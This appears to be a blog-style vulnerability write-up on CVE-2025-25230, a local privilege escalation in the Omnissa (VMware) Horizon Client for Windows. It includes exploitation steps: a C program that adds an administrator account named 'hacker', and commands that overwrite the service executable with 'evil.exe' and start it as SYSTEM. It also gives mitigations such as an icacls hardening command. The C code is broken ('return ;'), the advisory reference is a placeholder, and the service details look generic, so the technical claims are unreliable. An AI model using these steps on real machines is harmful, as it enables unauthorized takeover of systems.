CVE-2025-25230 is a newly disclosed Local Privilege Escalation (LPE) vulnerability affecting the Omnissa Horizon Client for Windows—previously VMware Horizon Client. This flaw gives a local attacker the chance to gain SYSTEM or Admin-level privileges, starting from a standard user account. This post covers the vulnerability's technical background, how it can be exploited, and mitigation strategies, using practical examples and a clear overview.
What is Omnissa (VMware) Horizon Client?
The Omnissa Horizon Client is popular software, extensively used in enterprises, education, and finance, to connect end-users to their virtual desktops and remote applications. If a security bug lets a standard user gain more permissions, it can threaten the entire organization.
Description
A local attacker who already has access to a Windows system where Horizon Client is installed can exploit CVE-2025-25230 to gain SYSTEM-level permissions. The vulnerability comes from poor permissions on one of the client's service executables, allowing a regular user to replace or tamper with it. When the system runs that service with elevated privileges, it executes attacker-controlled code instead.
Vulnerable Component
Usually, Omnissa Horizon Client installs a Windows service (for example, VMware Horizon Client Service), which runs as SYSTEM.
The installer sets loose permissions on the service's executable file (e.g., in C:\Program Files\VMware\VMware Horizon View Client\bin\). If a user without admin rights is allowed to write to this file, they can replace it with a malicious EXE.
You can use the following PowerShell command to check who can write to the service executable
Get-Acl "C:\Program Files\VMware\VMware Horizon View Client\bin\vmware-view.exe" | Format-List
Look for any unexpected users or groups (like "Users" or "Authenticated Users") in the Access output with "Write" permission.
Find the Service Executable:
Use the Services management console or command line to identify the executable path for the Horizon Client service.
Stop the service (if allowed).
- Replace the binary (vmware-view.exe) with your own malicious executable (e.g., a reverse shell or add-admin tool).
Below is a basic example of a "malicious" executable in C that creates a new admin user
#include <windows.h>
int main() {
system("net user hacker P@sswrd! /add");
system("net localgroup administrators hacker /add");
return ;
}
Compile this using Visual Studio or MinGW, then overwrite the legitimate service exe.
Command-Line Exploit (Copying Malicious EXE)
copy evil.exe "C:\Program Files\VMware\VMware Horizon View Client\bin\vmware-view.exe"
net start "VMware Horizon Client Service"
The above commands will run evil.exe as SYSTEM.
WARNING: Using this on your own test system is okay, but never attack systems you don't own!
References
- VMware Security Advisory (VMSA-2025-XX) *(Update: monitor for the official advisory)*
- Omnissa Horizon Client Release Notes
- Standard LPE Exploitation Techniques
- Understanding Windows Service Permissions
How To Fix
- Update the Horizon Client as soon as Omnissa (VMware) releases a patched version. Check official advisories regularly.
- Restrict file permissions: Set correct permissions on the service executables. Only 'Administrators' and 'System' should have write access.
- Monitor for new local users/admin accounts and other signs of compromise.
Example: Harden Permissions via Command Line
icacls "C:\Program Files\VMware\VMware Horizon View Client\bin\vmware-view.exe" /inheritance:r /grant:r "Administrators:F" "SYSTEM:F"
Conclusion
CVE-2025-25230 shows how a simple file permission mistake in a widely-used desktop client can have serious consequences. Even in environments with up-to-date anti-virus and strong perimeter security, local privilege escalation bugs present a real risk.
Monitor: Watch for suspicious privilege changes.
Stay safe, and keep your Horizon clients patched and locked down!
Timeline
Published on: 04/16/2025 22:15:14 UTC
Last modified on: 04/17/2025 20:21:48 UTC